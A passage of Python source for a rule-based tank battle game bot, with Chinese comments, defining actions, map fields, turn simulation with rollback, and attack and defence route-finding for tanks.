obj.__dict__.get(self.__name__, _MISSING) if value is _MISSING: value = self.func(obj) obj.__dict__[self.__name__] = value return value @staticmethod def clean(obj, key): """ 清除缓存 """ obj.__dict__.pop(key, None) def memorize(func): """ 根据参数列表缓存函数的返回值的修饰器 ------------------------------------ 1. func 会以 __memory__ 缓存返回结果 2. func 会带上 make_key 方法,可以用来获取传入参数列表对应的缓存 key 3. func 会带上 clear_memory 方法,可以清空所有的缓存结果 4. 如果返回值是生成器,会立即获得完整结果并转为 tuple 类型 这个函数主要用于缓存搜索路径 """ def _make_key(func, *args, **kwargs): _key = ( func.__module__, func.__name__, args, sorted(kwargs.items()) # kwargs 自动排序 ) return hashlib.md5(pickle.dumps(_key)).hexdigest() def _clear_memory(func): if hasattr(func, "__memory__"): func.__memory__.clear() @functools.wraps(func) def wrapper(*args, **kwargs): if not hasattr(func, "__memory__"): func.__memory__ = {} key = _make_key(func, *args, **kwargs) res = func.__memory__.get(key, _MISSING) if res is _MISSING: res = func(*args, **kwargs) if isinstance(res, types.GeneratorType): res = list(res) # 如果返回结果是生成器,那么马上获得所有结果 func.__memory__[key] = res return res wrapper.make_key = functools.partial(_make_key, func) wrapper.clear_memory = functools.partial(_clear_memory, func) return wrapper class SingletonMeta(type): """ Singleton Metaclass @link https://github.com/jhao104/proxy_pool/blob/428359c8dada998481f038dbdc8d3923e5850c0e/Util/utilClass.py """ _instance = {} def __call__(cls, *args, **kwargs): if cls not in cls._instance: cls._instance[cls] = super(SingletonMeta, cls).__call__(*args, **kwargs) return cls._instance[cls] class UniqueIntEnumMeta(type): """ 使得枚举类内所有的 int 值都增加一个 __offset__ 偏移量 使得不同的枚举类可以用同样的 int 值申明 case,但是不同枚举类间,实际的属性值不同不同 需要在类属性中通过 __offset__ 值申明偏移量 """ def __new__(cls, name, bases, attrs): offset = attrs.get("__offset__", 0) # 默认为 0 for k, v in attrs.items(): if isinstance(v, int): attrs[k] += offset return super(UniqueIntEnumMeta, cls).__new__(cls, name, bases, attrs) class DataSerializer(object): @staticmethod def _unpad(s): return s.rstrip("=") 
@staticmethod def _pad(s): return s + "=" * ( 4 - len(s) % 4 ) @staticmethod def serialize(obj): return __class__._unpad( base64.b64encode( gzip.compress( pickle.dumps(obj))).decode("utf-8")) @staticmethod def deserialize(s): return pickle.loads( gzip.decompress( base64.b64decode( __class__._pad(s).encode("utf-8")))) #{ END 'utils.py' }# #{ BEGIN 'action.py' }# class Action(object): # 空与无效 DUMMY = -3 # 额外添加的 INVALID = -2 # 停止 STAY = -1 # 移动 MOVE_UP = 0 MOVE_RIGHT = 1 MOVE_DOWN = 2 MOVE_LEFT = 3 # 射击 SHOOT_UP = 4 SHOOT_RIGHT = 5 SHOOT_DOWN = 6 SHOOT_LEFT = 7 # 根据 action 的值判断移动方向和射击方向 DIRECTION_OF_ACTION_X = ( 0, 1, 0, -1 ) DIRECTION_OF_ACTION_Y = ( -1, 0, 1, 0 ) DIRECTION_OF_ACTION_XY = ( (0,-1), (1,0), (0,1), (-1,0) ) # 方便用于迭代 MOVE_ACTIONS = ( MOVE_UP, MOVE_RIGHT, MOVE_DOWN, MOVE_LEFT ) SHOOT_ACTIONS = ( SHOOT_UP, SHOOT_RIGHT, SHOOT_DOWN, SHOOT_LEFT ) VALID_ACTIONS = ( STAY, ) + MOVE_ACTIONS + SHOOT_ACTIONS _ACTION_NAMES = [ "Invalid", "Stay", "Up Move", "Right Move", "Down Move", "Left Move", "Up Shoot", "Right Shoot", "Down Shoot", "Left Shoot", ] @staticmethod def is_valid(action): # 是否为有效行为 return -1 <= action <= 7 @staticmethod def is_stay(action): # 是否为停止行为 return action == -1 @staticmethod def is_move(action): # 是否为移动行为 return 0 <= action <= 3 @staticmethod def is_shoot(action): # 是否为射击行为 return 4 <= action <= 7 @staticmethod def is_opposite(action1, action2): """ 两个行动方向是否相对 """ if action1 == -1 or action2 == -1: return False return action1 % 4 == (action2 + 2) % 4 @staticmethod def is_same_direction(action1, action2): """ 两个行动方向是否相同 """ if action1 == -1 or action2 == -1: return False return action1 % 4 == action2 % 4 @staticmethod def get_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的 move 行为值 可以不相邻! 
""" dx = np.sign(x2 - x1) dy = np.sign(y2 - y1) if dx == dy == 0: return -1 # STAY for idx, dxy in enumerate(__class__.DIRECTION_OF_ACTION_XY): if (dx, dy) == dxy: return idx else: raise Exception("can't move from (%s, %s) to (%s, %s) in one turn" % (x1, y1, x2, y2) ) @staticmethod def get_move_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 这个就是对 get_action 的命名,这出于历史遗留问题 ... """ return __class__.get_action(x1, y1, x2, y2) @staticmethod def get_shoot_action(x1, y1, x2, y2): """ 获得 (x1, y1) -> (x2, y2) 的射击行为 """ return __class__.get_action(x1, y1, x2, y2) + 4 @staticmethod def get_name(action): return __class__._ACTION_NAMES[action + 2] #{ END 'action.py' }# #{ BEGIN 'field.py' }# class Field(object): DUMMY = -1 EMPTY = 0 BRICK = 1 STEEL = 2 WATER = 3 #-----------------------# # rule: BASE + 1 + side # #-----------------------# BASE = 4 # side = -1 BLUE_BASE = 5 # side = 0 RED_BASE = 6 # side = 1 #-----------------------# # rule: TANK + 1 + side # #-----------------------# TANK = 7 # side = -1 BLUE_TANK = 8 # side = 0 RED_TANK = 9 # side = 1 MULTI_TANK = 10 def __init__(self, x, y, type): self.x = x self.y = y self.type = type self.destroyed = False @property def xy(self): return (self.x, self.y) @property def yx(self): return (self.y, self.x) def __repr__(self): return "%s(%d, %d)" % ( self.__class__.__name__, self.x, self.y) class EmptyField(Field): def __init__(self, x, y): super().__init__(x, y, Field.EMPTY) class BrickField(Field): def __init__(self, x, y): super().__init__(x, y, Field.BRICK) class SteelField(Field): def __init__(self, x, y): super().__init__(x, y, Field.STEEL) class WaterField(Field): def __init__(self, x, y): super().__init__(x, y, Field.WATER) class BaseField(Field): def __init__(self, x, y, side): super().__init__(x, y, Field.BASE) self._side = side @property def side(self): return self._side def __repr__(self): return "%s(%d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side) class TankField(Field): def 
__init__(self, x, y, side, id): super().__init__(x, y, Field.TANK) self._side = side self._id = id self.previousAction = Action.DUMMY @property def side(self): return self._side @property def id(self): return self._id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self._side, self._id) # const BASE_FIELD_TYPES = ( Field.BASE, Field.BLUE_BASE, Field.RED_BASE ) TANK_FIELD_TYPES = ( Field.TANK, Field.BLUE_TANK, Field.RED_TANK, Field.MULTI_TANK ) #{ END 'field.py' }# #{ BEGIN 'map_.py' }# class Map(object): def __init__(self, width, height): self._width = width self._height = height self._content = [ [[] for x in range(width)] for y in range(height) ] @property def width(self): return self._width @property def height(self): return self._height @property def size(self): return (self._width, self._height) def in_map(self, x, y): """ 判断 (x, y) 坐标是否位于地图内 """ return 0 <= x < self._width and 0 <= y < self._height def __getitem__(self, xy): """ 获得 xy: (x, y) 的内容 """ x, y = xy if not self.in_map(x, y): raise Exception("(%s, %s) is not in map" % (x, y) ) return self._content[y][x] def get_fields(self, x, y): return self[x, y] class Tank2Map(Map, metaclass=SingletonMeta): class _Counter(object): """ 一个用于回滚计数的内部类 """ def __init__(self): self._counter = 0 def increase(self): self._counter += 1 def __iter__(self): return iter(range(self._counter)) def __repr__(self): return self._counter.__repr__() def __int__(self): return self._counter def __init__(self, width, height): super().__init__(width, height) self._tanks = [ [ None for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] self._bases = [ None for _ in range(SIDE_COUNT) ] self._turn = 0 self._destroyedRecords = [] # Stack([Record]) 记录被摧毁的 fields 用于回滚 # struct Record: ( # turn: int, # xy: (int, int), # field: Field, # ) self._previousActions = [] # Stack([ [[int, int], [int, int]] ]) 所有坦克的历史动作记录,用于回滚 self._performedActionsRecord = {} # turn -> [[int, int], [int, int]] 记录 
perform 所执行过的动作,用于 undo_revert self._init_bases() self._init_tanks() # ----------------------- #self._revertStack = [] # [debug] 保存需要 revert 的行为 #self._revertIdx = 0 # [debug] 当前 revert 的编号 def reset(self): # 重置整个地图 self.__clean_cache() width, height = self.size self.__init__(width, height) def __clean_cache(self): # 清除缓存属性 #CachedProperty.clean(self, "matrix") #CachedProperty.clean(self, "matrix_T") pass # 不再使用缓存啦 @property def turn(self): # 当前回合数 return self._turn @property def tanks(self): return self._tanks @property def bases(self): return self._bases #@CachedProperty # 缓存效果不明显 @property def matrix(self): """ 缓存 to_type_matrix 的值 WARNING: - 因为 list 是可变对象,因此不要对返回值进行修改,以免缓存的属性值改变 - 如需修改,需要首先调用 np.copy(matrix) 获得一个副本,然后对副本进行修改 """ return self.to_type_matrix() #@CachedProperty # 缓存效果不明显 @property def matrix_T(self): return self.matrix.T def _init_bases(self): """ 初始化基地和基地前的钢墙 """ assert self._width % 2 == 1, "Map width must be odd" xc = self._width // 2 # x-center y1 = 0 y2 = self._height - 1 basePoints = [ (xc, y1), # side 1 蓝方 (xc, y2), # side 2 红方 ] for side, (x, y) in enumerate(basePoints): base = BaseField(x, y, side) self._bases[side] = base self.insert_field(base) def _init_tanks(self): """ 初始化坦克 """ x1, x2 = (2, 6) y1, y2 = (0, self._height-1) tankPoints = [ [ (x1, y1), (x2, y1) ], # side 1 蓝方 左 0 右 1 [ (x2, y2), (x1, y2) ], # side 2 红方 左 1 右 0 ] for side, points in enumerate(tankPoints): tanks = self._tanks[side] for idx, (x, y) in enumerate(points): tank = TankField(x, y, side, idx) self.insert_field(tank) tanks[idx] = tank def insert_field(self, field): self[field.xy].append(field) field.destroyed = False def remove_field(self, field, record=True): self[field.xy].remove(field) field.destroyed = True if record: # 记录被清楚的对象 r = ( self._turn, field.xy, field ) self._destroyedRecords.append(r) def to_type_matrix(self): """ 转化成以 field.type 值表示的地图矩阵 Return: - matrix np.array( [[int]] ) 二维的 type 值矩阵 WARNING: - 矩阵的索引方法为 (y, x) ,实际使用时通常需要转置一下,使用 matrix.T """ 
width, height = self.size matrix = np.full((height, width), Field.DUMMY, dtype=np.int8) for y in range(height): for x in range(width): fields = self.get_fields(x, y) if len(fields) == 0: matrix[y, x] = Field.EMPTY elif len(fields) > 2: matrix[y, x] = Field.MULTI_TANK # 重合视为一个坦克 else: field = fields[0] if isinstance(field, (BaseField, TankField) ): matrix[y, x] = field.type + 1 + field.side # 遵循 Field 中常数定义的算法 else: matrix[y, x] = field.type return matrix def has_multi_tanks(self, x, y): """ 判断某坐标点是否有多辆坦克堆叠 """ return len( self.get_fields(x, y) ) > 1 def is_valid_move_action(self, tank, action): """ 判断是否为合法的移动行为 """ #assert Action.is_move(action), "action %s is not a move-action" % action if not Action.is_move(action): # 因为模拟地图导致了一些不可测的结果,这个地方不能 assert return False # 只要打一个补丁,开发的时候自己注意一下就好,记得 action % 4 _FIELDS_CAN_MOVE_TO = ( Field.DUMMY, Field.EMPTY ) # 遇到坦克不能移动! x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] x += dx y += dy if not self.in_map(x, y): return False fields = self.get_fields(x, y) if len(fields) == 0: return True elif len(fields) == 1: _type = fields[0].type if _type in _FIELDS_CAN_MOVE_TO: return True return False def is_valid_shoot_action(self, tank, action): """ 判断是否为合法的设计行为 """ # assert Action.is_shoot(action), "action %s is not a shoot-action" % action if not Action.is_shoot(action): return False return not Action.is_shoot(tank.previousAction) # 只要不连续两回合射击都合理 def is_valid_action(self, tank, action): """ 判断是否为合法行为 """ if not Action.is_valid(action): return False elif Action.is_stay(action): return True elif Action.is_move(action): return self.is_valid_move_action(tank, action) elif Action.is_shoot(action): return self.is_valid_shoot_action(tank, action) else: # 未知的行为 raise Exception("unexpected action %s" % action) def perform(self, blue_actions, red_actions): """ 执行一回合的行为 Input: - blue_actions [int, int] 蓝方 0, 1 号坦克将执行的动作 - red_actions [int, int] 红方 0, 1 号坦克将执行的动作 """ self._turn += 1 self.__clean_cache() #debug_print("Start Turn: 
%s" % self._turn) #self.debug_print_out("") _dx = Action.DIRECTION_OF_ACTION_X _dy = Action.DIRECTION_OF_ACTION_Y _actions = [ blue_actions, red_actions ] self._performedActionsRecord[self._turn] = _actions _fieldsToBeDestroyed = set() # 使用 set 避免重复 # 记录老的 previous actions _oldPreviousActions = [ [ tank.previousAction for tank in tanks ] for tanks in self._tanks ] self._previousActions.append(_oldPreviousActions) # 记录 # 检查 actions 合理性,修改 tank 缓存 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not self.is_valid_action(tank, action): raise Exception("%s will perform an invalid action %s" % (tank, action) ) tank.previousAction = action # 缓存本次行为,不考虑坦克是否已经挂掉 # 处理停止和移动 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_move(action): self.remove_field(tank) tank.x += _dx[action] tank.y += _dy[action] self.insert_field(tank) # 处理射击行为 for tanks in self._tanks: for tank in tanks: action = _actions[tank.side][tank.id] if not tank.destroyed and Action.is_shoot(action): x, y = tank.xy action -= 4 # 使之与 dx, dy 的 idx 对应 while True: x += _dx[action] y += _dy[action] if not self.in_map(x, y): break currentFields = self.get_fields(x, y) if len(currentFields) == 0: continue elif len(currentFields) > 1: # 必定都是 tank pass else: # len(currentFields) == 1 field = currentFields[0] if isinstance(field, (WaterField, EmptyField)): continue # 跳过水路和空格 elif ( isinstance(field, TankField) and not self.has_multi_tanks(x, y) and not self.has_multi_tanks(*field.xy) ): # 对射判断,此时两方所在格子均都只有一架坦克 oppTank = field oppAction = _actions[oppTank.side][oppTank.id] if ( Action.is_shoot(oppAction) and Action.is_opposite(action, oppAction) ): break # 对射抵消 else: pass # 坦克被摧毁 elif isinstance(field, SteelField): break # 钢墙无法摧毁 elif isinstance(field, (BrickField, BaseField) ): pass # 基地和土墙可以被摧毁 else: raise Exception("unexpected field type") _fieldsToBeDestroyed.update(currentFields) break # 摧毁了第一个遇到的 fields for 
field in _fieldsToBeDestroyed: self.remove_field(field) #debug_print("End Turn: %s" % self._turn) #self.debug_print_out() def single_simulate(self, tank, action): """ 模拟一回合: 其中一架 tank 执行一个特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - tank TankField/BattleTank 能表明坐标的 tank 对象 - action int 下回合的行动 """ actions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] actions[tank.side][tank.id] = action self.perform(*actions) def multi_simulate(self, *actions): """ 模拟一回合: 其中指定的多架坦克执行特定行为,其他 tank 均不动 模拟结束后,会自动回滚 Input: - *args 格式为 ( (Tank, action), (Tank, action), ... ) Tank 对象要求包含 side/id 属性 """ performedActions = [ [Action.STAY for _ in range(TANKS_PER_SIDE) ] for __ in range(SIDE_COUNT) ] for tank, action in actions: performedActions[tank.side][tank.id] = action self.perform(*performedActions) def revert(self): """ 回滚一回合的行为 Return: - success bool """ if self._turn <= 0: # 可以为 1 ,此时回滚到 Turn 0 的结束点 return False # 这表示回到地图最初的状态 currentTurn = self._turn records = self._destroyedRecords _actions = self._previousActions.pop() for side, tanks in enumerate(self._tanks): # 回滚历史动作 for id_, tank in enumerate(tanks): tank.previousAction = _actions[side][id_] while len(records) > 0: if records[-1][0] == currentTurn: turn, (x, y), field = records.pop() if isinstance(field, TankField): tank = field if not tank.destroyed: # tank 发生移动 self.remove_field(tank, record=False) tank.x = x tank.y = y self.insert_field(tank) else: self.insert_field(field) else: break self._turn -= 1 self.__clean_cache() #debug_print("Revert to Turn: %s" % self._turn) # 至 turn 的结束状态 #self.debug_print_out() return True def undo_revert(self): """ 从当前回合主动回滚到之前回合后,再将 revert 这个动作撤销 """ nextTurn = self._turn + 1 assert nextTurn in self._performedActionsRecord, "no previously revert operation found" actions = self._performedActionsRecord[nextTurn] self.perform(*actions) @contextmanager def simulate_one_action(self, tank, action): """ simulate 的 with 版用法,结束后会自动回滚 """ try: self.single_simulate(tank, 
action) #debug_print("simulate:", tank, action) #self._revertIdx += 1 #self._revertStack.append( (self._revertIdx, tank, action) ) yield except Exception as e: raise e finally: self.revert() # 不管出于什么错误,模拟结束后必定回滚 #self._revertStack.pop() #debug_print("revert:", tank, action) @contextmanager def simulate_multi_actions(self, *actions): """ multi_simulate 的 with 用法 """ try: self.multi_simulate(*actions) yield except Exception as e: raise e finally: self.revert() @contextmanager def rollback_to_previous(self): """ 回滚到先前回合 回滚结束后,会自动撤销回滚 """ try: success = self.revert() yield except Exception as e: raise e finally: if success: self.undo_revert() # 回合结束后撤销回滚 @contextmanager def auto_revert(self): """ 自动实现多轮回滚 可以在 yield 后连续不定次调用 single_simulate/multi_simulate 函数, 模拟结束后自动调用 counter 次 revert 来自动多轮回滚 yield 后可以通过调用 cnt.increase 来增加回滚次数 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.simulate 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.revert() @contextmanager def auto_undo_revert(self): """ 同上,但会在结束时通过调用 counter 次 undo_revert 来实现多轮 revert 操作的回滚 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.revert 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.undo_revert() def get_game_result(self): """ 判断胜利方 Return: - result int 比赛结果 > GAME_STATUS_NOT_OVER 比赛尚未结束 > GAME_STATUS_DRAW 平局 > GAME_STATUS_BLUE_WIN 蓝方获胜 > GAME_STATUS_RED_WIN 红方获胜 """ failed = [ False for _ in range(SIDE_COUNT) ] # 0 蓝方 1 红方 for side in range(SIDE_COUNT): # 坦克全部被消灭 tanks = self._tanks[side] if all(tank.destroyed for tank in tanks): failed[side] = True # 基地被摧毁 baes = self._bases[base] if base.destroyed: failed[side] = True if failed[0] and failed[1]: return GAME_STATUS_DRAW elif not failed[0] and failed[1]: return GAME_STATUS_BLUE_WIN elif failed[0] and not failed[1]: return GAME_STATUS_RED_WIN else: return GAME_STATUS_NOT_OVER def debug_print_out(self, compact=COMPACT_MAP): """ [DEBUG] 输出整个地图 Input: - compact bool 是否以紧凑的形式输出 
""" if not DEBUG_MODE: return EMPTY_SYMBOL = " " BASE_SYMBOL = "基" BRICK_SYMBOL = "土" STEEL_SYMBOL = "钢" WATER_SYMBOL = "水" BLUE_TANK_SYMBOL = "蓝" RED_TANK_SYMBOL = "红" MULTI_TANK_SYMBOL = "重" UNEXPECTED_SYMBOL = "?" SPACE = " " if not compact else "" _TEXT_WIDTH = (self._width * 2 - 1) if not compact else self._width CUT_OFF_RULE = "=" * _TEXT_WIDTH print_inline = functools.partial(print, end=SPACE) print("\n%s" % CUT_OFF_RULE) if not compact: print("") for y in range(self._height): for x in range(self._width): fields = self._content[y][x] if len(fields) == 0: print_inline(EMPTY_SYMBOL) elif len(fields) > 1: print_inline(MULTI_TANK_SYMBOL) elif len(fields) == 1: field = fields[0] if isinstance(field, EmptyField): print_inline(EMPTY_SYMBOL) elif isinstance(field, BaseField): print_inline(BASE_SYMBOL) elif isinstance(field, BrickField): print_inline(BRICK_SYMBOL) elif isinstance(field, SteelField): print_inline(STEEL_SYMBOL) elif isinstance(field, WaterField): print_inline(WATER_SYMBOL) elif isinstance(field, TankField): tank = field if tank.side == 0: print_inline(BLUE_TANK_SYMBOL) elif tank.side == 1: print_inline(RED_TANK_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) print("\n" if not compact else "") print("%s\n" % CUT_OFF_RULE) #{ END 'map_.py' }# #{ BEGIN 'tank.py' }# class BattleTank(object): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的作战对象 使得该对象对于特定的 tank 对象为 Singleton """ key = (tank.side, tank.id) obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 用自定义的函数初始化,而不是 __init__ ,为了防止单例被反复调用 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map #self.__attackingRoute = 
None # 缓存变量 -> 为了支持地图回滚,将路线缓存暂时去掉了 def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self.side, self.id) def __copy__(self): return self def __deepcopy__(self): # singleton ! return self @property def field(self): return self._tank @property def tank(self): return self._tank @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def x(self): return self._tank.x @property def y(self): return self._tank.y @property def xy(self): return self._tank.xy @property def destroyed(self): return self._tank.destroyed @property def canShoot(self): # 本回合是否可以射击 return not Action.is_shoot(self._tank.previousAction) def is_this_field_in_our_site(self, field, include_midline=False): """ 判断某个 field 是否位于我方半边地盘 Input: - field Field - include_midline bool 是否包含分界线 """ base = self._map.bases[self.side] if include_midline: return ( np.abs( field.y - base.y ) <= 4 ) else: return ( np.abs( field.y - base.y ) < 4 ) def is_this_field_in_enemy_site(self, field, include_midline=False): # 默认不包含中线 """ 是否处于敌方半边的地图 """ return not self.is_this_field_in_our_site(field, include_midline= not include_midline) def is_in_our_site(self, include_midline=False): """ 是否处于我方半边的地图 Input: - include_midline bool 是否包含分界线 """ return self.is_this_field_in_our_site(self.tank, include_midline=include_midline) def is_in_enemy_site(self, include_midline=True): """ 是否处于地方半边的地图 """ return self.is_this_field_in_enemy_site(self.tank, include_midline=include_midline) def is_near_midline(self, offset=1): """ 是否在中线附近 Input: - offset int 定义中线范围为 4 ± offset 的范围 例如 offset = 1 则 [3, 5] 均为中线范围 """ return ( np.abs( self.y - 4 ) <= offset ) def get_surrounding_empty_field_points(self, **kwargs): """ 获得周围可以移动到达的空位 """ tank = self._tank map_ = self._map x, y = tank.xy points = [] for dx, dy in get_searching_directions(x, y, **kwargs): x3 = x + dx y3 = y + dy if not 
map_.in_map(x3, y3): continue fields = map_[x3, y3] if len(fields) == 0: points.append( (x3, y3) ) elif len(fields) > 2: continue else: field = fields[0] if isinstance(field, EmptyField): points.append( (x3, y3) ) else: continue return points def get_all_valid_move_actions(self, **kwargs): """ 所有合法的移动行为 """ tank = self._tank map_ = self._map actions = [] x1, y1 = tank.xy for x2, y2 in self.get_surrounding_empty_field_points(**kwargs): moveAction = Action.get_move_action(x1, y1, x2, y2) map_.is_valid_move_action(tank, moveAction) actions.append(moveAction) return actions def get_all_valid_shoot_actions(self): """ 获得所有合法的射击行为 """ if self.canShoot: return list(Action.SHOOT_ACTIONS) else: return [] def get_all_valid_actions(self): """ 获得所有合法的行为 """ return self.get_all_valid_move_actions() + self.get_all_valid_shoot_actions() + [ Action.STAY ] def get_all_shortest_attacking_routes(self, ignore_enemies=True, bypass_enemies=False, delay=0, **kwargs): """ 获得所有最短的进攻路线 -------------------------- Input: - ignore_enemies bool 是否将敌人视为空 - bypass_enemies bool 是否将敌人视为 SteelField 然后尝试绕过他0 - delay int 允许与最短路线延迟几步 WARNING: ignore_enemies 与 bypass_enemies 为互斥选项,至多选择一个 Yield From: - routes [Route] """ if ignore_enemies and bypass_enemies: raise ValueError("you can't think of enemies as steel and air at the same time") map_ = self._map tank = self._tank side = tank.side oppSide = 1- tank.side oppBase = map_.bases[oppSide] if ignore_enemies: matrix_T = fake_map_matrix_T_without_enemy(map_, tank.side) elif bypass_enemies: matrix_T = fake_map_matrix_T_thinking_of_enemy_as_steel(map_, tank.side) else: matrix_T = map_.matrix_T kwargs.setdefault("middle_first", False) # 优先边路搜索 routes = find_all_routes_for_shoot( tank.xy, oppBase.xy, matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, # 队友有可能会变成阻碍! 
5cdde41fd2337e01c79f1284 Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, # 不将敌方坦克加入到其中 ), **kwargs) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_attacking_route(self, *args, **kwargs): """ 获得默认的最短攻击路径 """ for route in self.get_all_shortest_attacking_routes(*args, **kwargs): return route # 直接返回第一个 route def get_next_attacking_action(self, route=None): """ 下一个进攻行为,不考虑四周的敌人 Input: - route Route 自定义的攻击路径 默认为 None ,使用默认的最短路径 """ tank = self._tank map_ = self._map oppBase = map_.bases[1 - tank.side] battler = self if route is None: route = battler.get_shortest_attacking_route() if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明 start 和 end 相同,已经到达基地,这种情况也不可能 return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): # 但是,如果正前方就是基地,则不移动,只射击 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: continue elif len(fields) > 1: break else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): break # 钢墙不可以射穿 elif isinstance(field, BrickField): # 土墙认为可以射掉 continue elif isinstance(field, TankField): # 坦克也认为可以射掉 if field.side == tank.side: break # 队友坦克不进攻 continue # 敌方坦克在此处不应该出现,他们应该在上游的决策中被考虑到 elif field is oppBase: if battler.canShoot: # 这个时候如果能够射击,就优先射击 return action + 4 else: continue # 其他情况仍然优先移动 return action ## 遇到墙/敌方基地/坦克,不能移动 if battler.canShoot: # 尝试射击 action += 4 for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and 
field.side == tank.side: return Action.STAY # 仅需要防止射到队友 return action # 不能射击,只好等待 return Action.STAY def get_all_next_attacking_actions(self, routes=None): """ 返回所有给定路线的下一回合行为的并集 Input: - route [Route]/None Return: - actions [int] """ if routes is None: routes = self.get_all_shortest_attacking_routes() # 默认用所有最短的进攻路线 return list(set( self.get_next_attacking_action(route) for route in routes )) def get_all_shortest_defensive_routes(self, delay=0, **kwargs): """ 获得所有的回防路线 ---------------- 同 get_all_shortest_attacking_routes """ map_ = self._map tank = self._tank side = tank.side base = map_.bases[side] matrix_T = map_.matrix_T kwargs.setdefault("middle_first", True) routes = find_all_routes_for_move( tank.xy, base.xy, matrix_T, **kwargs, ) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_defensive_route(self, *args, **kwargs): """ 获取默认的最短路线 """ for route in self.get_all_shortest_defensive_routes(*args, **kwargs): return route # 直接返回第一个 def get_next_defensive_action(self, route=None): """ 获得下一个防御动作,不考虑周围敌人 """ tank = self._tank map_ = self._map base = map_.bases[tank.side] if route is None: route = self.get_shortest_defensive_route() if route.is_not_found(): return Action.STAY elif route.length == 0: return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): return action ## 遇到墙/己方基地/坦克,不能移动 if self.canShoot: # 尝试射击 action += 4 for field in self.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and field.side == tank.side: return Action.STAY # 仅需要防止射到队友 elif isinstance(field, BaseField) and field is base: return Action.STAY # 遇到己方基地 return action # 
否则就是等待了 return Action.STAY def get_shortest_route_to_enemy(self, oppTank): """ 查找射杀敌方的最短路线 TODO: 可能需要判断水路 尚没有被使用过 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = find_shortest_route_for_shoot( tank.xy, oppTank.xy, map_.matrix_T, # 正常地图 block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, Field.TANK + 1 + oppSide, # 加入地方坦克 ), x_axis_first=True, # 优先左右拦截 ) return route def get_route_to_enemy_by_move(self, oppTank, block_teammate=True, **kwargs): """ 近身条件下,获得到达对方的路劲 """ tank = self._tank map_ = self._map side = tank.side if block_teammate: # 将己方坦克和重叠坦克视为 block block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ) else: block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ) # 优先左右拦截 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, oppTank.xy, map_.matrix_T, block_types=block_types, **kwargs, ) return route def get_route_to_point_by_move(self, x2, y2, **kwargs): """ 这个函数仅限于在基地中获得用来移动到两个 guard point 的最短路径 !s """ tank = self._tank map_ = self._map side = tank.side # 优先左右移动 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, (x2, y2), map_.matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ), **kwargs, ) return route def get_route_to_field_by_move(self, field, **kwargs): """ 上一个函数的一个简单扩展 """ x2, y2 = field.xy return self.get_route_to_point_by_move(x2, y2, **kwargs) def get_next_hunting_action(self, oppTank): """ 下一个追杀敌军的行为 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = self.get_shortest_route_to_enemy(oppTank) if 